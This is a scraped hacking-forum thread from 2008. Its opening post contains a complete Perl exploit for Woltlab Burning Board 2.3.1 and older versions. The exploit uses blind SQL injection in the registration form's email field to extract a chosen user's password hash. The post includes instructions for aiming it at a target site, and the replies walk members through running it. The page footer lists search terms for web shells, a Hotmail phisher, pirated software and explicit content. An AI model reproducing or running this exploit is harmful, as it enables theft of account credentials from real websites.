BadHackerZ BHZ Image
Go Back   BadHackerZ > Hacking Arena > Exploit Codes

Notices

IMG Me Up
Register Now for FREE!
Our records show you have not yet registered to our forums. To sign up for your FREE account INSTANTLY fill out the form below!

Username: Password: Confirm Password: E-Mail: Confirm E-Mail:
Birthday:      
Random Question
  I agree to forum rules 

Reply
 
LinkBack Thread Tools Display Modes
Old 05-02-2008   #1 (permalink)
Founder
 
The Boss's Avatar
 
Join Date: Mar 2006

Posts: 7,413
Thanks: 130
Thanked 232 Times in 139 Posts
Rep Power: 285 The Boss has a reputation beyond repute
The Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to The Boss
Default

Copy this code and paste it into notepad then save as exploitnamehere.pl

Edit the code to use it
ex.

my $host = 'www.domainoftheforumhere.com';
my $path = '/forums/'; # path to the board /forums/ is most common
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = 'Optional'; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards not needed

<div class='codetop'>CODE</div><div class='codemain' style='height:200px;white-space:pre;overflow:auto'>#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";



my $host = 'www.security-project.org';
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards


# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
print "[~] Using a proxy\n";
}
else
{
print "[~] You're using NO proxy!\n";
sleep(1);
}





#
# Get the hash
#

print "[~] Getting the hash. Please wait some minutes..\n[+] Hash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";


sub test
{
my ($i, $num, $g) = @_;

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "sre4sdffr\@4g54asd5.org' OR (userid=$userid AND ascii(substring(password,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num)/*";
my $data = "r_username=$username&r_email=$value&r_password=aa aaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_ic q=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=& r_gender=0&r_signature=&r_usertext=&field%5B1%5D=& field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecoo kies=1&r_admincanemail=1&r_showemail=1&r_usercanem ail=1&r_emailnotify=0&r_notificationperpm=0&r_rece ivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures =1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_ umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_ti meformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_ usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid= &disclaimer=viewed";

print $sock "POST http://$host${path}register.php HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: ".length($data)."\r\n\r\n$data\r\n";


while(<$sock>)
{
if($_ =~ m/$error/) { return 1; }
}
return 0;
}

# milw0rm.com [2005-05-20]</div>
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
The Boss is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote

Old 05-26-2008   #2 (permalink)
Studentz
 
Armageddon's Avatar
 
Join Date: Jun 2006

Location: On port u forgot to secure!
Age: 18
Posts: 6,125
Thanks: 57
Thanked 171 Times in 126 Posts
Rep Power: 250 Armageddon has a reputation beyond repute
Armageddon has a reputation beyond reputeArmageddon has a reputation beyond reputeArmageddon has a reputation beyond reputeArmageddon has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to Armageddon
Default

thnxxx a lot..
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
Armageddon is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-26-2008   #3 (permalink)
Hackerz Guru
 
Join Date: Feb 2008

Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 161 Times in 99 Posts
Rep Power: 0 Immortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond repute

Awards Showcase
Hall Of Fame 1K group 
Total Awards: 2

Send a message via MSN to Immortal Send a message via Yahoo to Immortal
Default

thanks for this i seen other exploits like these can you explain briefly how to use them plz. thanks
Immortal is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-26-2008   #4 (permalink)
Founder
 
The Boss's Avatar
 
Join Date: Mar 2006

Posts: 7,413
Thanks: 130
Thanked 232 Times in 139 Posts
Rep Power: 285 The Boss has a reputation beyond repute
The Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to The Boss
Default

you need to have perl installed on your system... thn open notepad.... copy this code onto it and save as anyname.pl

now put this file in your bin folder of perl directory

run this exploit via command prompt....ie c:/perl/bin/anyname.pl

i hope it helps
The Boss is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-26-2008   #5 (permalink)
Hackerz Guru
 
Join Date: Feb 2008

Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 161 Times in 99 Posts
Rep Power: 0 Immortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond repute

Awards Showcase
Hall Of Fame 1K group 
Total Awards: 2

Send a message via MSN to Immortal Send a message via Yahoo to Immortal
Default

Quote:
Originally Posted by The Boss View Post
you need to have perl installed on your system... thn open notepad.... copy this code onto it and save as anyname.pl

now put this file in your bin folder of perl directory

run this exploit via command prompt....ie c:/perl/bin/anyname.pl

i hope it helps
thanks boss im all sorted now.
Immortal is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-31-2008   #6 (permalink)
Junior Member
 
Join Date: May 2008

Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0 kwiateusz is on a distinguished road
Default

u say thats for ipb but in exploit it's woltab burning board :] you made a mistake
kwiateusz is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-31-2008   #7 (permalink)
Experienced Member
 
Join Date: May 2008

Posts: 310
Thanks: 0
Thanked 9 Times in 8 Posts
Rep Power: 31 ThE KinG will become famous soon enough
Default

thanx a lot dude...
ThE KinG is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-31-2008   #8 (permalink)
Founder
 
The Boss's Avatar
 
Join Date: Mar 2006

Posts: 7,413
Thanks: 130
Thanked 232 Times in 139 Posts
Rep Power: 285 The Boss has a reputation beyond repute
The Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond reputeThe Boss has a reputation beyond repute

Awards Showcase
6K Group 5K Group 4K Group 3K Group 2K group 1K group 
Total Awards: 6

Send a message via Yahoo to The Boss
Default

Quote:
Originally Posted by kwiateusz View Post
u say thats for ipb but in exploit it's woltab burning board :] you made a mistake
What do you mean
The Boss is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-31-2008   #9 (permalink)
Badhackerz
 
RampageX11's Avatar
 
Join Date: Apr 2008

Location: Detention cell
Posts: 628
Thanks: 96
Thanked 60 Times in 25 Posts
Rep Power: 59 RampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond reputeRampageX11 has a reputation beyond repute
Default

but whaty to do after saving it in pl and thanks thnks
__________________
selling



To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.



To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
RampageX11 is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Old 05-31-2008   #10 (permalink)
Hackerz Guru
 
Join Date: Feb 2008

Location: GuildFord
Age: 18
Posts: 1,973
Thanks: 34
Thanked 161 Times in 99 Posts
Rep Power: 0 Immortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond reputeImmortal has a reputation beyond repute

Awards Showcase
Hall Of Fame 1K group 
Total Awards: 2

Send a message via MSN to Immortal Send a message via Yahoo to Immortal
Default

RapidShare: 1-Click Webhosting

active perl
Immortal is offline  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Similar Threads
Thread Thread Starter Forum Replies Last Post
phpBB 2.0.21 (alltopics.php) SQL Injection Exploit Armageddon Exploit Codes 0 08-06-2008 12:01 PM
ODFaq 2.1.0 Blind SQL Injection Exploit Armageddon Exploit Codes 0 08-04-2008 01:40 PM
HRS Multi Blind SQL Injection Exploit Armageddon Exploit Codes 0 08-01-2008 03:04 PM
Remote SQL Injection Exploit Immortal Exploit Codes 0 05-28-2008 10:21 PM
phpBB 3 Remote SQL Injection Exploit KnightRider Exploit Codes 2 05-24-2008 07:52 AM

These are the 100 most searched terms
Search Cloud
(intitle:r57shell | intitle:c99shell) +uname acoustic solutions asvm-6271 aishwarya fakes ambit 256 hack bad hackerz badgewinners.com badhackerz badhackerz.com c99shell c99shell powered by admin c99shell v. 1.0 pre-release build #16 choda chudi cmbus-pkg3-nat-any.cm cousin ki chudai dhcp sniffer eset nod32 rapidshare evan poczik evllp.dll free tamil sex stories hotmail phisher idm 512 infinite firmware interesting computer facts intext:rapidshare.com/files linkgrabber 3.1 intitle:c99shell v. 1.0 pre-release +uname ipb 2.3.1 exploit j downloader logmein pro rapidshare logmein rapidshare mass effect megaupload mass effect rapidshare naughtyamerica.com nod32 rapidshare nod32 rapidshare.com pinnacle studio 12 rapidshare powered by captain crunch security team ptgui rapidshare rapidshare rosetta stone rosetta stone application rosetta stone rapidshare rosetta stone romanian rosetta stone update safe-mode: off (not secure) drwxrwxrwx c99shell sigma 1.7 softjtag